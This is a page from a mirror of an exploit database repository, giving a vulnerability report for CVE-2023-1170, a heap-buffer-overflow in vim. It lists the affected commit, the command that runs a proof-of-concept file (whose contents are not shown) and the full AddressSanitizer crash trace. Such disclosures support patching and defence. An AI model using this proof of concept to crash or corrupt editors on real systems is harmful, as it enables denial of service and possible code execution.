openkylin
/
openkylin-exploit-db
mirror of https://gitee.com/openkylin/openkylin-exploit-db.git
9
0
Fork 0
Code Issues Projects Releases Wiki Activity
openkylin-exploit-db/cve/vim/2023/CVE-2023-1170
History
s0uthwood 7ef8e2141d 添加CVE-2023-1170 2023-04-03 01:53:02 +00:00
..
README.md 添加CVE-2023-1170 2023-04-03 01:53:02 +00:00
poc8_hbo.dat 添加CVE-2023-1170 2023-04-03 01:53:02 +00:00

README.md

Description

Heap-buffer-overflow in utf_ptr2char at mbyte.c:1825.

vim version

git log
commit f0300fc7b81e63c2584dc3a763dedea4184d17e5 (grafted, HEAD -> master, tag: v9.0.1365, origin/master, origin/HEAD)

Proof of Concept

./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc8_hbo.dat -c :qa
=================================================================
==28015==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000008900 at pc 0x55bde0d0e239 bp 0x7fff1bc7f540 sp 0x7fff1bc7f530
READ of size 1 at 0x621000008900 thread T0
    #0 0x55bde0d0e238 in utf_ptr2char /home/fuzz/vim/src/mbyte.c:1825
    #1 0x55bde0d410af in gchar_cursor /home/fuzz/vim/src/misc1.c:550
    #2 0x55bde0dbe950 in adjust_cursor_eol /home/fuzz/vim/src/ops.c:1873
    #3 0x55bde0ed97e7 in do_put /home/fuzz/vim/src/register.c:2301
    #4 0x55bde0db035d in nv_put_opt /home/fuzz/vim/src/normal.c:7378
    #5 0x55bde0daf772 in nv_put /home/fuzz/vim/src/normal.c:7255
    #6 0x55bde0d866e1 in normal_cmd /home/fuzz/vim/src/normal.c:939
    #7 0x55bde0bff4d3 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
    #8 0x55bde0bff292 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
    #9 0x55bde0bfeb36 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
    #10 0x55bde0bdad87 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
    #11 0x55bde0bd1ef2 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
    #12 0x55bde0f01d65 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
    #13 0x55bde0f02fe0 in do_source /home/fuzz/vim/src/scriptfile.c:1905
    #14 0x55bde0effa08 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
    #15 0x55bde0effa6d in ex_source /home/fuzz/vim/src/scriptfile.c:1276
    #16 0x55bde0bdad87 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
    #17 0x55bde0bd1ef2 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
    #18 0x55bde0bd028c in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
    #19 0x55bde12037ab in exe_commands /home/fuzz/vim/src/main.c:3146
    #20 0x55bde11fc8ea in vim_main2 /home/fuzz/vim/src/main.c:782
    #21 0x55bde11fc19c in main /home/fuzz/vim/src/main.c:433
    #22 0x7fcb6ae03082 in __libc_start_main ../csu/libc-start.c:308
    #23 0x55bde0a44e4d in _start (/home/fuzz/vim/src/vim+0x142e4d)

0x621000008900 is located 0 bytes to the right of 4096-byte region [0x621000007900,0x621000008900)
allocated by thread T0 here:
    #0 0x7fcb6b29a808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x55bde0a4528a in lalloc /home/fuzz/vim/src/alloc.c:246
    #2 0x55bde0a4507b in alloc /home/fuzz/vim/src/alloc.c:151
    #3 0x55bde1207c37 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:885
    #4 0x55bde1205f48 in mf_new /home/fuzz/vim/src/memfile.c:375
    #5 0x55bde0d2bba8 in ml_new_data /home/fuzz/vim/src/memline.c:4138
    #6 0x55bde0d19983 in ml_open /home/fuzz/vim/src/memline.c:391
    #7 0x55bde0a618ea in open_buffer /home/fuzz/vim/src/buffer.c:192
    #8 0x55bde1202add in create_windows /home/fuzz/vim/src/main.c:2915
    #9 0x55bde11fc6ac in vim_main2 /home/fuzz/vim/src/main.c:713
    #10 0x55bde11fc19c in main /home/fuzz/vim/src/main.c:433
    #11 0x7fcb6ae03082 in __libc_start_main ../csu/libc-start.c:308

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/vim/src/mbyte.c:1825 in utf_ptr2char
Shadow bytes around the buggy address:
  0x0c427fff90d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fff90e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fff90f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fff9100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fff9110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fff9120:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fff9130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fff9140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fff9150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fff9160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fff9170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==28015==ABORTING

poc: poc8_hbo.dat

Impact

This vulnerability is capable of crashing software, modify memory, and possible remote execution.